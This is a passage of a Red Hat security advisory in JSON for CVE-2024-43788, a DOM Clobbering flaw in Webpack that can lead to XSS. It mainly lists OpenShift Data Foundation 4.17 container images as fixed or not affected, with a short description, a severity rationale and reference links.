"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2308193"
}
],
"notes": [
{
"category": "description",
"text": "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x"
],
"known_not_affected": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43788"
},
{
"category": "external",
"summary": "RHBZ#2308193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308193"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43788",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43788"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788",
